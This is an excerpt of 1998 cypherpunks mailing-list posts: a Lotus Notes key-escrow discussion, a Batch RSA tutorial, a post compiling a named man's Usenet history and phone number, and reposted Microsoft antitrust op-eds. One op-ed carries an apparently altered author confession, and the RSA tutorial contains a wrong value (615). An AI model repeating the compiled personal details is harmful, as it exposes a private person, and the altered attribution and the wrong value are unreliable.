The Digital Society is purposefully working cheap and small to enable the
tools and communities to be deployed at as close as possible to no cost for
the end-user - that is the priority.

Most things are being coded from scratch to ensure security and keep the
costs low. Labor is cheap - when its your own.


:)
Jalon

---------------------------------------------------------------
Jalon Q. Zimmerman, Director
The Digital Society Group
A division of Openworld, Inc.

http://www.openworld.com/
jalonz@openworld.com
---------------------------------------------------------------
The government is not your mommy.
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 8 Jan 1998 14:03:03 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <v0311070eb0d8be53e6a8@[207.94.249.133]>
Message-ID: <v03110710b0d9f850d94d@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:36 AM -0800 1/7/98, William H. Geiger III wrote:
>   at 12:10 AM, Bill Frantz <frantz@netcom.com> said:
>
>>At 11:49 AM -0800 1/6/98, Eric Cordian wrote:
>>>I managed to find a document entitled "Security in Lotus Notes and the
>>>Internet" on the Web.
>>>
>>>It describes the weakening procedure as follows.
>>>
>>>  "No matter which version of Notes you are using, encryption uses the
>>>   full 64-bit key size. However, the International edition takes 24 bits
>>>   of the key and encrypts it using an RSA public key for which the US
>>>   National Security Agency holds the matching private key. This
>>>   encrypted portion of the key is then sent with each message as an
>>>   additional field, the workfactor reduction field. The net result of
>>>   this is that an illegitimate hacker has to tackle 64-bit encryption,
>>>   which is at or beyond the practical limit for current decryption
>>>   technology and hardware. The US government, on the other hand, only
>>>   has to break a 40-bit key space, which is much easier (2 to the power
>>>   of 24 times easier, to be precise)."
>
>>It seems to me that if you step on the correct part of the message, you
>>zap the encrypted 24 bits, and cut NSA out of the loop.  Of course the
>>receiver could notice and refuse to decrypt, which would require some
>>software hacking to defeat, but that is certainly doable.
>
>Wouldn't it be much better just to not use the crap?!?
>
>Why should we give our money to a company that has shown that they will
>sell us out at the first chance of making a buck doing so??

I don't plan on using it, but the Swedes have a bit of an installed base
problem.


-------------------------------------------------------------------------
Bill Frantz       | One party wants to control | Periwinkle -- Consulting
(408)356-8506     | what you do in the bedroom,| 16345 Englewood Ave.
frantz@netcom.com | the other in the boardroom.| Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Thu, 8 Jan 1998 03:11:02 +0800
To: cypherpunks@cyberpass.net
Subject: Fiat's Batch RSA
Message-ID: <199801071855.TAA07264@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Batch RSA
invented by Amos Fiat

Described in Crypto 89 and J Cryptology 1997.


RSA works as follows.  The key owner chooses two secret primes p and q,
and forms their product n = p*q.  He then chooses a public exponent e
relatively prime to p-1 and q-1.  His public key is (n, e).

To encrypt a message m into cyphertext c, m is raised to the power e, mod
n: c = m^e mod n.  To decrypt the message, the key holder calculates d
as the multiplicative inverse of e mod (p-1)(q-1): d = 1/e mod (p-1)(q-1).
He recovers m from m = c^d mod n.

For simplicity, below we will write this as m = c^(1/e) mod n, where it
is understood that the 1/e is done mod (p-1)(q-1).

An RSA signature s on a message m is calculated as for a decryption:
s = m^(1/e) mod n.  The signature is verified by m ?=? s^e mod n.

The time consuming part of an RSA decryption or signature is this
exponentiation step.  e can be chosen to be small, so encryption and
verification is fast, but 1/e will generally be about the same size as n,
so many multiplications must be done to raise a number to that power.

Amos Fiat describes a method whereby multiple messages can be decrypted
or signed using only one full-sized exponentiation.  The "catch" is that
the messages must all use different exponents with the same n.

Here is a concrete example.  You want to decrypt or sign two messages,
M1 and M2, raising M1 to the 1/3 power and M2 to the 1/5 power.  Perform
the following steps:

	M12 = M1^5  *  M2^3
	I12 = M12 ^ (1/15)

This is the only full-sized exponentiation needed.  This gives:

	I12 = M1^(1/3) * M2^(1/5).

This is the product of the two values that we want.  Fiat uses a trick
to disentangle the two values.  He raises I12 to the 6th power.  The
number 6 is chosen so that it is a multiple of one of the two
exponents, 3, and is 1 more than a multiple of the other exponent, 5:

	I12^6 = M1^2 * M2 * M2^(1/5)

Therefore:

	M2^(1/5) = I12^6 / (M1^2 * M2)

which is one of the values we need.  Since I12 is the product of the two
values we want, we can recover the other value just by dividing this into
I12:

	M1^(1/3) = I12 / M2^(1/5)


Here is another example.  Suppose we want M3^(1/7) and M4^(1/11).  (Note
that we are using prime numbers for the exponents; the reason will be
explained below.)  We calculate:

	M34 = M3^11  *  M4^7
	I34 = M34 ^ (1/77)

This gives us:

	I34 = M3^(1/7) * M4^(1/11)

Again this is the product of the two values we want.  As before we will
raise this to a power which is 1 more than a multiple of one of the two
exponents (7 and 11) and is a multiple of the other one.  The smallest
such power is 22.

	I34^22 = M3^3 * M3^(1/7) * M4^2

So we can divide to get M3^(1/7):

	M3^(1/7) = I34^22 / (M3^3 * M4^2)

And we can divide to get the other value needed:

	M4^(1/11) = I34 / M3^(1/7)


This illustrates how to derive two RSA roots using only one full sized
exponentiation.  A few small exponentiations are also needed, as well
as two divisions, but these are much faster than doing the full
exponentiation (raising to the 1/15 or 1/77 powers above).

Fiat's idea can then be applied recursively.  Note that in the examples
above we had to take two full-sized exponentiation, M12 to the 1/15 power
and M34 to the 1/77 power.  We can combine both of these exponentiations
into one just as was done above:

	M14 = M12^77 * M34^15
	I14 = M14 ^ (1/1155)

Now:

	I14 = M12^(1/15) * M34^(1/77)

the product of the two values we want.  We need an exponent which is
1 more than a multiple of 15 while being a multiple of 77, giving
615, or vice versa, giving 540.  Choosing the latter since it is smaller
we have:

	I14^540 = M12^36 * M34^7 * M34^(1/77)

so:

	M34^(1/77) = I14^540 / (M12^36 * M34^7)

and dividing gives the other factor:

	M12^(1/15) = I14 / M34^(1/77)

These values can then be fed into the expressions above to recover
M1^(1/3) and the other three values, all with only one full-sized
exponentiation for the four messages.

In general, finding the exponent for Ixx can be handled by the Chinese
Remainder Theorem.  However it requires that the two values be
relatively prime.  That is why the exponents used in Batch RSA must
all be relatively prime, so that there is a solution to the value of
the exponent for Ixx.

As the number of values in the batch increases, the "small" exponents
needed to recover the values increase as well.  We saw above that the
exponents went from 6 and 22 for the size-two batches to 540 for the
size-four batch.  This means that you reach a point of diminishing
returns where increasing the batch size no longer provides much
benefit.  Fiat suggests a batch size of n/(log^2 n) messages, where n
is the length of the full-sized exponentiation (e.g. 1000 for a 1000
bit modulus).  This would correspond to about a 10 message batch for
a 1024 bit key.

Fiat describes a few situations where it may be appropriate to use
different exponents for multiple RSA operations.  In the case of a
server issuing multiple RSA signatures it could define its public key
to be (n, e1, e2, e3,...) and specify that the signature was valid for
any exponent in the list.  Then it could batch up signatures and use a
different exponent for each one.

Another case is "pure RSA" encryption, where the message itself is broken
into blocks and each one is RSA encrypted.  In that case the blocks could
use successive exponents from the list, and the receiver could decrypt
a batch of blocks using one large exponentiation.

There is another case of interest to us, related to the task of
searching through messages from a message pool, possibly
steganographically hidden.  That will be described in another message.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Thu, 8 Jan 1998 04:30:16 +0800
To: cypherpunks@toad.com
Subject: lists
Message-ID: <19980107200049.20317.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain



Can someone tell me if the toad cypherpunk list gets *all* the cypherpuink traffic?  As I understand it there are three
possible subscription points -- does one subscription cover
all?

Thanks in advance...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Thu, 8 Jan 1998 10:34:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: a good example of bad crypto hype
In-Reply-To: <3.0.5.32.19980107171614.007c4eb0@206.40.207.40>
Message-ID: <199801080230.UAA11585@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



David Honig wrote:

> at http://www.meganet.com/explain.htm
> you can test your critical thinking skills...

Clearly everyone in this company is on crack. :)

--
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 8 Jan 1998 10:11:51 +0800
To: cypherpunks@toad.com
Subject: Re:  The Digital Society Group
Message-ID: <199801080202.VAA11825@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: jalonz@openworld.com
   >   To: cypherpunks@toad.com
   >   Date: Tue, 6 Jan 1998 18:07:24 -0500
   >   Subject: The Digital Society Group
   >   
   >   Hi all,

Hi, stranger.

   >   Openworld, Inc. is a company which sets up free enterprise zones around the
   >   world. The "free zones" are akin to Hong Kong and Singapore and are
   >   self-governing, independent entities as recognized by the parent country.
   [snip]
   >   A division of Openworld, Inc., The Digital Society Group, has been formed
   >   to apply technology to the infrastructure of the free zones and essentially
   >   mirror them in cyberspace <argh, the cyber word again>.
   >   
   >   Without getting into too much detail, The Digital Society Group is
   >   constructing a pure-technology infrastructure to provide for the operation,
   >   governance and existence of a complete digital society within a free
   >   enterprise zone.
   [snip]
   >   Locations are planned for Africa, Southeast Asia, Russia, etc.
   >   
   >   We are already coding...
   >   ---------------------------------------------------------------
   >   Jalon Q. Zimmerman, Director
   >   The Digital Society Group
   >   A division of Openworld, Inc.

Firing up the DejaNews traffic analysis tool...

    Jalon Q. Zimmerman:
    
    sneaker@powergrid.electriciti.com
    jalonz@compuvar.com
    jalon@ix.netcom.com
    jalonz@datacore.compuvar.com
    jalonz@morava.com
    jalon@hermesnet.net

#   Subject:      I need a challenge!!
#   From:         "Jalon Q. Zimmerman" <sneaker@powergrid.electriciti.com>
#   Date:         1995/06/19
#   Newsgroups:   misc.jobs.resumes
#   
#   I'm bored with the usual run-of-the-mill jobs and am looking for a
#   challenge.  I want to solve problems, find solutions, and create
#   things with computers.
#   
#   My background is in programming/computer security and I have a
#   strong creative talent.
#   
#   My dream is to work in the R&D environment where I can be given
#   a problem/idea and turned loose.

Good boy. Good boy. Stop slobbering on the carpet...

 
%   Subject:      ENTERTAINMENT: The CyberGuy Project
%   From:         jalonz@compuvar.com (Jalon Q. Zimmerman)
%   Date:         1995/10/23
%   Newsgroups:   comp.infosystems.www.announce
%    
%   Follow the crazed wanderings of a technomad. Announcing the CyberGuy
%   Project. The first fully functioning guy, with a real job, and a real
%   life, living with a laptop, a duffel bag full of stuff and the wide,
%   wide world as his home...
%    
%   <URL:http://zgroup.compuvar.com/cyberguy/> [defunct]

Word: "Technomad". Like it.

#   I am moving.  1995/09/27

Moving from San Diego to...

 
#   Subject:      Columbus, Ohio - webheads netnerds arthackers wanted!
#   From:         jalon@ix.netcom.com (Jalon Q. Zimmerman)
#   Date:         1996/04/08
#   Newsgroups:   oh.general,alt.cyberpunk,alt.rave,alt.2600
#    
#   I'm looking for webheads, netnerds and arthackers in the Columbus area
#   to form an unstructured group and get a hangout going somewhere in a
#   Columbus coffee-house or something like that.
#    
#   The idea is to throw a bunch of people and some resources together and
#   see what happens.
#    
#   I have just moved to Columbus from San Diego where this type of thing
#   is a necessity for modern cyberpeople. Since I can't find anything
#   here, I thought I'd get it going myself.
#    
#   If you are interested, mail me and we'll make it happen.

Columbus "4DeadIn" Ohio.

%   Subject:      Looking for investor wishing to start an internet provision company in Columbus
%   From:         "Jalon Q. Zimmerman" <jalon@ix.netcom.com>
%   Date:         1996/01/16
%   Newsgroups:   cmh.general
%    
%   I am looking for an investor wishing to start an Internet presence or
%   service provision company in the Columbus, Ohio area.  I have just
%   relocated from San Diego, Ca. and am interested in contributing the
%   "technical" element to a start-up venture.
%    
%   Please contact Jalon Zimmerman at: 614-873-4250
%    
%   Serious inquiries only.

Mooer.

#   From:         "Jalon Q. Zimmerman" <jalonz@morava.com>
#   Date:         1996/10/20
#   Newsgroups:   alt.mud.moo
#    
#   Hello,
#    
#   We are looking to sponsor a moo or some variation thereof as well as a
#   rather serious Mxx-related website for the sheer coolness of it.


Headhunter:

        Date   Scr        Subject                 Newsgroup            Author
 
   1. 96/07/19 020 Corporate salespeople wanted sdnet.jobs            Jalon Q. Zimmerman
   2. 96/07/19 020 Interns wanted - marketing/P sdnet.jobs            Jalon Q. Zimmerman
   3. 96/07/19 020 Corporate sales - Internet r sdnet.wanted          Jalon Q. Zimmerman
   4. 96/07/19 020 Corporate salespeople wanted sdnet.jobs.offered    Jalon Q. Zimmerman
   5. 96/07/19 020 Re: Corporate salespeople wa sdnet.jobs            Jalon Q. Zimmerman
   6. 96/07/19 020 Re: Corporate salespeople wa sdnet.jobs            Jalon Q. Zimmerman
   7. 96/07/19 020 Interns wanted - marketing/P sdnet.jobs.offered    Jalon Q. Zimmerman

   ...moved to DC/Maryland...

#   Subject:  Exciting Internet jobs in growing DC & MD business: Programming,
#             Graphics Design, Web Page Design, Customer Service, and More!
#             Full-Time and Contractual positions saught.
#   From:         Cool Internet Jobs <jalon@hermesnet.net>
#   Date:         1997/03/13
#   Newsgroups:   dc.jobs,md.jobs,balt.jobs,misc.jobs.offered,us.jobs.offered,
#                 biz.jobs.offered,prg.jobs,comp.jobs.contract,misc.jobs.contract
#    
#   On May 1, 1997, Hermes Internet Service, Inc. will be opening a second
#   office in Landover, Md., which is located at the intersection of US 50
#   and the DC Beltway and walking distance to the New Carrollton Metro
#   (Orange Line).
#   
#   We will continue to use our current location as well, near 7th Street
#   and Maine Ave., SW, DC, near the waterfront.
#    
#   We have openings for four additional people, the first immediately, the
#   other three on May 1:


Resume (snipped):

#   Subject:      html/CGI/db online inet apps - VB/MS Access - Linux/Postgres95
#   From:         "Jalon Q. Zimmerman" <sneaker@powergrid.electriciti.com>
#   Date:         1995/06/25
#   Newsgroups:   misc.jobs.resumes
#   
#   DIGICOM
#    
#   Developing an HTML interface to telephone conferencing hardware for Logicon, a
#   defense contractor.  Group telephone conferencing can be managed from any HTML
#   browser via a LAN or the internet.  The system incorporates user accounting,
#   document sharing within a conference, graphical icons and elements including
#   photographs of the group participants, secure html interfacing, support for voice
#   encrypted lines.  Each server handles 32 simultaneous queries and 32 phone lines.
#   The application is written in Visual Basic using Winsock 1.0 sockets, MS Access
#   database tables, HTML 3.0, and MS Visual C++ DLLs.
#   
#    
#   CREDIFAX INFORMATION SERVICES
#    
#   Designed and implemented an automated credit information retrieval and analysis
#   solution.  The system automated the office workflow, paper trail, billing, and
#   communications.  The final solution utilized an in-house client-server scheme for
#   communications, a Paradox for Windows database platform, and an automated  credit
#   retrieval and analysis application in C++.  Communications servers were run on OS/2,
#   database platforms on Windows, and high-speed credit analysis under DOS. This was
#   the second generation of the system developed at Credit Depot earlier.
#   
#   SAN DIEGO COMMUNITY COLLEGE DISTRICT
#    
#   Designed a statistical analysis solution to track the usage of learning resources on
#   campus.  Authored several encryption and security applications.
#   
#   SAN DIEGO DISTRICT ATTORNEY'S OFFICE.
#    
#   Computer Security - Provide computer security assistance in criminal
#   investigations.  Tasks include data decryption, recovering erased data,
#   password retrieval, data line monitoring, and protected system entry.

Isn't that last item special?

---guy

   And a possible reason for heading the other way.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Thu, 8 Jan 1998 11:04:05 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <99d5b130b3c4dbe1a86b35eb0bd8f255@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



         CRACKING
             DOWN
                 ON
       MICROSOFT

           The Justice
       Department has
       a long history of
            mistaking
         innovators for
          monopolists

       BY LAWRENCE J. SISKIND







          THE DEPARTMENT OF JUSTICE has
          painted its assault on Microsoft Corp. as a campaign against
          tying. Microsoft, the government says, should not be
          allowed to force manufacturers who load Windows95 onto
          their computers to include the Internet Explorer Web
          browser. 

          Close inspection, however, reveals that the DOJ is not
          guarding against tying -- it is guarding against change. And
          while the Justice Department has won the first round
          against the software giant, the question of whether that
          change is good or ill should be left to the market to decide,
          not the government.

          When the DOJ charged Microsoft with violating their 1995
          consent decree, it cited Sec. IV(E)(I), which bars Microsoft
          from conditioning the licensing of any one product on the
          licensing of another. Microsoft's Windows95 operating
          system includes the Internet Explorer -- IE -- Web browser.
          Microsoft openly forbids PC manufacturers licensed to load
          Windows95 from removing the browser. To Joel Klein, head
          of the DOJ's Antitrust Division, this is unlawful tying, plain
          and simple. "We think the evidence will show unmistakably
          that these are two separate products," he said. "Everybody
          knows you have an operating system and you have a
          browser."

          Everybody also knows that whenever a lawyer begins a
          statement with the phrase "everybody knows," the
          consequent proposition will be questionable at best. Mr.
          Klein's statement was not flat-out wrong. But it was flat-out
          nearsighted. The only thing "everybody knows" about
          operating systems is that they are constantly changing.



               Mr. Klein's statement was not
            flat-out wrong. But it was flat-out
                nearsighted. The only thing
           'everybody knows' about operating
          systems is that they are constantly
                             changing.



          An operating system program controls the operation of the
          computer, determining which programs run and when. It
          also coordinates the interaction between the computer's
          memory and its attached devices. When the world's first PC,
          the Altair 8800, appeared in 1975, its operating system
          didn't have much to operate. The product was a
          do-it-yourself kit, without display screen or printer.
          Operating systems became more complex as personal
          computers became more versatile.

          FAR-FLUNG PERIPHERALS

          Contemporary operating systems are as far removed from
          the early operating systems as Cape Kennedy is from Kitty
          Hawk. They have evolved to manage a growing array of
          peripherals: keyboard, monitor, disk drives, printer, fax,
          modem and more. They have also embraced new features
          and capabilities: data compression, disk defragmentation,
          multimedia extensions and data transmission technology.
          All of these features, by the way, once existed as separate
          programs. Yet no one views their inclusion in modern
          operating systems as any kind of tying.

          Which brings us to the Windows95 operating system. When
          Microsoft began to develop Windows95, then code-named
          "Chicago," it decided to build Internet technology into it.
          The early elements of this technology included a Web
          browser and were code-named "O'Hare." The very first
          commercially available versions of Windows95 included
          Internet Explorer as a component. Since then, IE has been
          repeatedly upgraded, with each successive version more
          tightly intertwined with the rest of the operating system.
          The most recent version, IE 4.0, is ubiquitous, and allows
          the user to explore World Wide Web sites from anywhere on
          the computer. One can connect to the Web without even
          opening the browser, and one can view Web sites (called
          "channels") without connecting to the Internet.

          What is true about Windows95 also holds true for rival
          products. Brit Hume recently observed in the Weekly
          Standard: "The distinction between browsers and
          operating systems has blurred to the point where it's not
          clear where one ends and the other begins." Every major
          contemporary operating system now contains Internet
          technology.



            Designing an operating system to
             access the Internet represents a
                quantitative, rather than a
                      qualitative, change.



          The intermeshing of operating systems with Internet
          capabilities is eminently logical. These systems have always
          been designed to access information. In the early days, that
          meant accessing hard drives and floppy-disk drives. With
          the advent of the CD-ROM, they were designed to access
          data from that source. As businesses brought PCs into the
          office, computers became linked together into networks;
          operating systems were designed to access information from
          local area networks.

          The Internet, for all its unimaginably vast dimensions, is
          just another repository of information to a computer.
          Designing an operating system to access the Internet
          represents a quantitative, rather than a qualitative, change.

          MICROSOFT SLACKING

          Ironically, this is not a change sponsored or spearheaded
          by Microsoft. If anything, Bill Gates has been a laggard in
          this area. His rivals are far ahead and he is playing
          catch-up.

          The great proponents of Internet-driven computers have
          emerged from Silicon Valley, not from Redmond, Wash.
          Larry Ellison, CEO of Oracle Corp., has long championed
          the idea of the "network computer." Consider computers as
          underwater divers. Equipping each diver with his own tanks
          is wasteful and inefficient. It imposes severe limits on how
          long and how far the diver can explore. Instead, let every
          diver be connected to a surface mothership. The connection
          frees the diver from the limitations and burdens of carrying
          his own tanks. Similarly, loading millions of PCs with their
          own copies of software programs is a waste of resources.
          Instead, let every computer be networked and draw its
          software needs from the vast store of the Internet. The
          result, Ellison says, would be high-quality personal
          computers retailing at about $500.

          In line with this thinking, Sun Microsystems has developed
          Java, a language that allows programmers to create
          Internet-based applications capable of running on any
          computer, regardless of operating system. Sun's CEO, Scott
          McNealy, notes that 400,000 programmers (including 2,500
          at IBM) are currently writing programs in Java language.
          The libertarian journalist and futurist George Gilder
          believes Java will revolutionize personal computing and
          render proprietary systems like Windows obsolete.

          If the future of personal computing is indeed linked to the
          Internet, then weaving Internet technology into Windows95
          (and even more intimately and pervasively into Windows98)
          is not a grab for power. It is a clutch for survival.

          Which brings us back to the DOJ's decision to prosecute
          Microsoft for tying. Some have suspected a political bias,
          noting that in 1992 and 1996 Silicon Valley entrepreneurs
          were among Clinton's best friends in the business
          community. Microsoft, on the other hand, has always
          remained aloof from politics.

          'INSTITUTIONAL MYOPIA'

          But I believe the attack on Microsoft stems from
          institutional myopia rather than political bias. The DOJ's
          Antitrust Division may understand the law and may be
          sincerely dedicated to enforcing it fairly. But it has no way
          of knowing where the economy is headed or how fast it is
          heading in that direction. Instead, the division views the
          economy as static. An operating system will always be an
          operating system. A browser will always be a browser. Just
          like timber, coal or oil: Products do not change.

          Because of this institutional myopia, the DOJ has a history
          of marching down wrong roads. In 1969, it prosecuted IBM.
          Fifteen years passed before the department finally
          understood what every high school techno-geek already
          knew: The computer industry was dynamic, and Big Blue
          was not dominant.



               If the Internet is the future of
           personal computing, then weaving
            Internet technology into Windows
               is not a grab for power. It is a
                      clutch for survival.



          The hapless campaign against IBM probably did no harm.
          Other Antitrust Division missteps have. In the 1960s and
          '70s, long after most Americans had abandoned the
          neighborhood Mom-and-Pop store for the national chain,
          the DOJ was prosecuting Topco Associates, a cooperative
          association of small grocery chains. The DOJ wanted to
          protect the association's small regional members. It failed to
          notice the dynamic changes already apparent to the
          average shopper. The days of the Mom-and-Pop grocer were
          over. And while the DOJ was successfully squashing Topco,
          its much more powerful rivals -- The Great Atlantic & Pacific
          Tea Co. Inc. (A&P), Safeway Inc., the Kroger Co. -- were
          assuming dominance over the grocery business.

          The same myopia underlies the decision to prosecute
          Microsoft. Enslaved by its institutional myopia, the DOJ
          simply cannot understand that operating systems change.
          Thus, it sees tying when in fact there is transmutation.

          Internet-oriented operating systems may be the wave of the
          future. Or they may be a detour to nowhere. Not everyone
          likes or needs the endless waits, the superfluous graphics
          and the flood of irrelevant and unwanted information that
          always seem to accompany excursions onto the Internet.
          Nothing is certain in high tech; business empires rise and
          fall with stunning rapidity. Confronting this sometimes
          creative, sometimes destructive turmoil, a wise government
          would recognize its limitations and restrict its role. Whether
          Windows95 should include Internet Explorer is a question
          best left to the millions of jurors who make up the
          marketplace.




                                AUTHOR

     LAWRENCE J. SISKIND is a San Francisco attorney who specializes in
   intellectual property law. Mr. Siskind owns stock in Microsoft Corp. He hopes
   that his pro-Microsoft opinions, once published, will influence the price of his
       stock favorably. The expectation of financial gain has colored, if not
                 dictated, the opinions expressed in his article.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Thu, 8 Jan 1998 11:02:54 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2257f75e9d4378c573ebe49c9a1d7acc@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



               Creative Insecurity 
               The complicated truth behind the rise of Microsoft 

               By Virginia I. Postrel 

               Back in 1983, Forbes ran an article called "If they're so smart,
               why aren't they rich?" It was about how inventors rarely reap
               big financial rewards from their creations, and it started like
               this:

               "Here are some names you are not likely ever to see in The
               Forbes Four Hundred [list of the richest Americans]: Franklin
               Lim. Gary Kildall. Bill Gates...."

               Oops.

               The world's richest man wasn't always so. During the last
               round of high-tech excitement--the personal-computer boom of
               the early 1980s (which was followed by a traumatic
               shakeout)--Gates looked like a smart programming geek whose
               business savvy was dwarfed by the marketing whizzes at
               Apple: "Their Apple Corp.," wrote the anonymous Forbes
               author, "has been among the most successful at packaging a
               product that sells and then selling it at an attractive price."

               Therein lies a tale. As the Justice Department and a half-dozen
               state attorneys general push forward antitrust actions against
               Microsoft, it's worth considering how the company got where it
               is and what that suggests about the strengths and limitations of
               markets.

               There are two main fables told about Microsoft: It has become
               the dominant, standard-setting software company, and made
               Gates a multibillionaire, because a) it makes wonderful
               products and expresses all that is good about a capitalist
               system or b) it cheats. Both fables turn up especially strongly in
               statements by people who lack deep knowledge of the
               industry, and each serves the interests of an industry faction.

               The truth, however, is more complicated. Considered without
               regard to price, ubiquity, or compatibility with inexpensive
               hardware, many Microsoft products are mediocre at best. I am
               happily writing this article using an obsolete Macintosh
               operating system and WordPerfect, both of which I find
               superior to even the latest versions of Windows and Word.
               Great products did not make Microsoft number one.
               Good-enough products did.

               That uncomfortable truth offends moralists on both sides of the
               Microsoft debate. The company's fans (and its spin doctors)
               want to tell a simple tale about virtue triumphant--with virtue
               defined, Atlas Shrugged-style, not only as astute business
               decision making and fierce competition but also as engineering
               excellence. Its critics use the same definition. If the products are
               less than great, they suggest, the only way to explain the
               company's success is through some sort of sleaze. Or,
               alternatively, through the innate flaws of the market.

               So what really happened? How did Microsoft end up ruling PC
               operating systems and, through them, software in general?

               At the risk of simplifying a complex story (if only by reducing
               it to two players), the bottom line is this: Apple acted--and
               continues to act--like a smug, self-righteous monopolist.
               Microsoft acted--and continues to act--like a scrambling,
               sometimes vicious competitor.

               That pattern shows up most clearly in pricing strategies.
               Microsoft's approach, throughout its history, has been to charge
               low prices and sell an enormous amount of software. True to
               form, the company is currently in trouble with the Justice
               Department for charging too little--nothing--for its Internet
               Explorer, by including it in Windows. (The technical legal
               dispute is over whether Explorer is a "feature" of Windows, as
               Microsoft maintains, or a separate product that is an illegal
               "tie-in" and thus violates a consent decree Microsoft signed in
               1995.)

               The low-price strategy makes sense on two levels: First, it
               approximates marginal-cost pricing, since software, once
               written, costs very little for each additional copy. Anything
               above that incremental cost, however small, is profit. Second,
               and more significantly in this case, lower prices mean more
               customers. And the more people who use a particular kind of
               software, the more desirable it is for others to use it too.
               Although translators help, switching formats is messy and
               inconvenient. This "network externality" is particularly
               important for operating systems and Internet browser formats,
               since software developers and Web site designers have to pick
               a standard for which to optimize their products.

               As Gates toldWall Street Journal reporter Jim Carlton in an
               interview for Carlton's new book Apple: The Inside Story of
               Intrigue, Egomania, and Business Blunders, "Momentum
               creates momentum. If you have volume, then people write
               apps. If people write apps, you have momentum."

               But if you think you already have a monopoly, you don't
               worry about momentum. While Apple executives theoretically
               knew they had competition, they acted as though they didn't.
               Back in 1983 Apple may have been "selling [its computers] at
               an attractive price." But the coming of the IBM clones made
               Apple's prices look downright hideous. In the face of
               ever-stronger competition, the company insisted on pricing the
               Macintosh to maintain at least 50 percent profit margins; its
               "50-50-50 rule" told managers to keep margins up to maintain
               the stock price.

               Customers who paid their own personal money for Macs might
               be able to justify the high price simply because the computers
               were fun and easy to use. But business managers who paid
               Apple prices for any but the most specialized applications,
               notably graphics-intensive work, were either fiscally
               irresponsible or just plain dumb. Apple's pricing strategy
               handed the vast business market to computers running
               Microsoft operating systems, first DOS, then Windows.

               Microsoft, of course, doesn't sell computers. It's in the software
               business. You can get its operating system (and run its
               applications) on all sorts of different machines, whose
               manufacturers compete intensely. That competition drives
               down consumer costs, even as machine features get better all
               the time.

               Apple didn't want that sort of competition. It not only kept its
               own prices high but refused to license its software to any other
               computer maker. That meant even fewer people used its
               operating system, which further dampened its momentum.
               Apple, in fact, acted like the ultimate "tie-in" monopolist. You
               not only couldn't buy parts of its software separately; you
               couldn't buy them at all without forking over thousands for an
               Apple-made machine. And Apple has never been particularly
               good at manufacturing.

               After the company tepidly began licensing a couple of years
               ago, Mac clone makers did what Apple had feared: They cut
               into its revenue. But they also expanded the market, and they
               made the fastest computers ever to carry the Mac operating
               system. They gave Apple money for its software, even as they
               bore the costs of manufacturing and distributing their
               machines. And they gave consumers more choice, more
               alternatives to Windows. If I were an antitrust regulator
               looking for conspiracies, I'd be wondering just how
               coincidental it was that Microsoft invested $150 million in
               Apple just about the time Steve Jobs announced that the
               company was ending the clone program.

               Such explanations aren't necessary, however. Apple screwed
               Mac lovers all by itself. Far from the marketing whizzes of 1983
               conventional wisdom, its executives were enamored with the
               cult of the machine, too hung up on the beauty of their product
               to understand that consumers actually cared about many other
               things: price, plenty of software, and compatibility with other
               systems. Quality is not one-dimensional.

               Apple's arrogance left computer users with less choice than
               they might have had--or, perhaps, with more. After all, if Apple
               had slashed prices early on and taken the business market
               seriously from the start, it could well have ended up in a
               Microsoft-like position, but without having to share its market
               with clones. Microsoft would then have been mostly an
               applications company, selling Excel and Word to Mac users,
               and we'd be hearing about the evil, anticompetitive actions of
               Steve Jobs.

               That seems unlikely, however, and the reason is revealing.
               Apple's all-in-one-box strategy was inherently brittle. It offered
               too many margins of error and too few margins of adjustment.

               The same company wrote the software and made the machines.
               So if the computers caught on fire, as they sometimes did, or
               the manufacturing plants couldn't keep up with Christmas
               demand, there was no alternative outlet for the Mac operating
               system. Software sales dropped too. No competitive sales force
               could go after business users while Jobs and company were
               chasing public schools. All new ideas had to come from within
               the same closed system. (For a discussion of related issues, see
               my Forbes ASAP article "Resilience vs. Anticipation". While
               Apple is based in Silicon Valley, its self-sufficiency strategy
               more closely resembles those of the minicomputer companies
               based around Boston.)

               Microsoft's partner-dependent system proved far more resilient
               as the industry changed. The company didn't have to do
               everything itself, and it could reap the benefits of innovations
               by others, whether in manufacturing, assembly, distribution, or
               applications software. Instead of the best minds of a single
               company, it enlisted the best minds of hundreds. And while
               Microsoft depended on its partners to build the market, in time
               they came to depend on Microsoft. The irony is that by making
               alliances and competing furiously--by not acting like a
               monopolist--Microsoft wound up reaping the benefits of a
               near-monopoly on its operating system.

               It is emphatically not true that "when you buy a computer, you
               already are without any choice as to the operating system," as
               Microsoft critic Audrie Krause said on Crossfire. Both
               REASON's production department and I personally will be
               buying new Macs in the next few months. Translation software
               makes it relatively easy to go from one operating system to
               another. Nowadays, it's possible to function reasonably well
               with an operating system that controls only 5 percent of the
               new-computer market.

               The great fear of Microsoft's critics is that the company will
               wind up controlling everything, foisting mediocre-to-poor
               products on an unwilling public at ever-higher prices. It's
               impossible to disprove that hypothetical scenario. But history,
               and Microsoft's own intense paranoia, cast doubt on it. Just
